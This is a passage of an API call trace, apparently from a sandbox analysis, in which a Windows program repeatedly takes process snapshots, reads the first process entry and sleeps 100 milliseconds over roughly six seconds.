th32ProcessID=0x0) returned 0x2424 [0202.485] Process32First (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0202.553] Sleep (dwMilliseconds=0x64) [0202.554] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2424 [0202.570] Process32First (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0202.629] Sleep (dwMilliseconds=0x64) [0202.631] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2424 [0202.643] Process32First (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0202.705] Sleep (dwMilliseconds=0x64) [0202.709] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2424 [0202.722] Process32First (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0202.797] Sleep (dwMilliseconds=0x64) [0202.799] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2424 [0202.839] Process32First (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0202.945] Sleep (dwMilliseconds=0x64) [0202.947] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2424 [0202.963] Process32First (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0203.060] Sleep (dwMilliseconds=0x64) [0203.062] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2424 [0203.076] Process32First (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0203.170] Sleep (dwMilliseconds=0x64) [0203.175] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2424 [0203.186] Process32First (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0203.239] Sleep (dwMilliseconds=0x64) [0203.249] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2424 [0203.259] Process32First (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0203.332] Sleep (dwMilliseconds=0x64) [0203.334] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2424 [0203.344] Process32First (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0203.397] Sleep (dwMilliseconds=0x64) [0203.400] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2424 [0203.414] Process32First (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0203.466] Sleep (dwMilliseconds=0x64) [0203.469] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2424 [0203.481] Process32First (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0203.533] Sleep (dwMilliseconds=0x64) [0203.535] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2424 [0203.545] Process32First (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0203.606] Sleep (dwMilliseconds=0x64) [0203.609] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2424 [0203.619] Process32First (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0203.673] Sleep (dwMilliseconds=0x64) [0203.674] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2424 [0203.684] Process32First (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0203.746] Sleep (dwMilliseconds=0x64) [0203.749] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2424 [0203.763] Process32First (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0203.830] Sleep (dwMilliseconds=0x64) [0203.832] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2424 [0203.844] Process32First (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0203.899] Sleep (dwMilliseconds=0x64) [0203.903] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2424 [0203.919] Process32First (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0204.089] Sleep (dwMilliseconds=0x64) [0204.091] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2424 [0204.106] Process32First (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0204.186] Sleep (dwMilliseconds=0x64) [0204.190] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2424 [0204.210] Process32First (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0204.275] Sleep (dwMilliseconds=0x64) [0204.276] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2424 [0204.310] Process32First (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0204.387] Sleep (dwMilliseconds=0x64) [0204.390] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2424 [0204.409] Process32First (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0204.479] Sleep (dwMilliseconds=0x64) [0204.482] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2424 [0204.496] Process32First (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0204.561] Sleep (dwMilliseconds=0x64) [0204.562] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2424 [0204.578] Process32First (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0204.644] Sleep (dwMilliseconds=0x64) [0204.646] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2424 [0204.663] Process32First (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0204.735] Sleep (dwMilliseconds=0x64) [0204.740] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2424 [0204.756] Process32First (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0204.825] Sleep (dwMilliseconds=0x64) [0204.827] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2424 [0204.839] Process32First (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0204.932] Sleep (dwMilliseconds=0x64) [0204.951] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2424 [0204.964] Process32First (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0205.041] Sleep (dwMilliseconds=0x64) [0205.045] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2424 [0205.059] Process32First (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0205.139] Sleep (dwMilliseconds=0x64) [0205.141] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2424 [0205.154] Process32First (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0205.270] Sleep (dwMilliseconds=0x64) [0205.272] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2424 [0205.316] Process32First (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0205.380] Sleep (dwMilliseconds=0x64) [0205.381] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2424 [0205.394] Process32First (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0205.453] Sleep (dwMilliseconds=0x64) [0205.458] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2424 [0205.473] Process32First (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0205.536] Sleep (dwMilliseconds=0x64) [0205.539] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2424 [0205.554] Process32First (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0205.622] Sleep (dwMilliseconds=0x64) [0205.623] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2424 [0205.636] Process32First (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0205.705] Sleep (dwMilliseconds=0x64) [0205.708] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2424 [0205.724] Process32First (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0205.795] Sleep (dwMilliseconds=0x64) [0205.796] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2424 [0205.813] Process32First (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0205.872] Sleep (dwMilliseconds=0x64) [0205.877] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2424 [0205.890] Process32First (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0205.949] Sleep (dwMilliseconds=0x64) [0205.951] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2424 [0205.966] Process32First (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0206.041] Sleep (dwMilliseconds=0x64) [0206.042] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2424 [0206.057] Process32First (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0206.126] Sleep (dwMilliseconds=0x64) [0206.127] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2424 [0206.142] Process32First (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0206.208] Sleep (dwMilliseconds=0x64) [0206.210] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2424 [0206.223] Process32First (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0206.326] Sleep (dwMilliseconds=0x64) [0206.332] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2424 [0206.346] Process32First (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0206.452] Sleep (dwMilliseconds=0x64) [0206.454] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2424 [0206.468] Process32First (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0206.540] Sleep (dwMilliseconds=0x64) [0206.542] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2424 [0206.562] Process32First (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0206.631] Sleep (dwMilliseconds=0x64) [0206.633] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2424 [0206.648] Process32First (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0206.727] Sleep (dwMilliseconds=0x64) [0206.728] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2424 [0206.747] Process32First (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0206.823] Sleep (dwMilliseconds=0x64) [0206.827] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2424 [0206.846] Process32First (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0206.922] Sleep (dwMilliseconds=0x64) [0206.936] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2424 [0206.950] Process32First (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0207.042] Sleep (dwMilliseconds=0x64) [0207.044] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2424 [0207.061] Process32First (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0207.141] Sleep (dwMilliseconds=0x64) [0207.143] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2424 [0207.162] Process32First (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0207.227] Sleep (dwMilliseconds=0x64) [0207.229] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2424 [0207.246] Process32First (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0207.356] Sleep (dwMilliseconds=0x64) [0207.359] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2424 [0207.375] Process32First (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0207.447] Sleep (dwMilliseconds=0x64) [0207.449] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2424 [0207.462] Process32First (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0207.533] Sleep (dwMilliseconds=0x64) [0207.536] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2424 [0207.564] Process32First (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0207.696] Sleep (dwMilliseconds=0x64) [0207.704] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2424 [0207.719] Process32First (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0207.787] Sleep (dwMilliseconds=0x64) [0207.790] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2424 [0207.807] Process32First (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0207.886] Sleep (dwMilliseconds=0x64) [0207.888] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2424 [0207.902] Process32First (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0207.978] Sleep (dwMilliseconds=0x64) [0207.981] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2424 [0208.009] Process32First (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0208.089] Sleep (dwMilliseconds=0x64) [0208.093] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2424 [0208.114] Process32First (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System 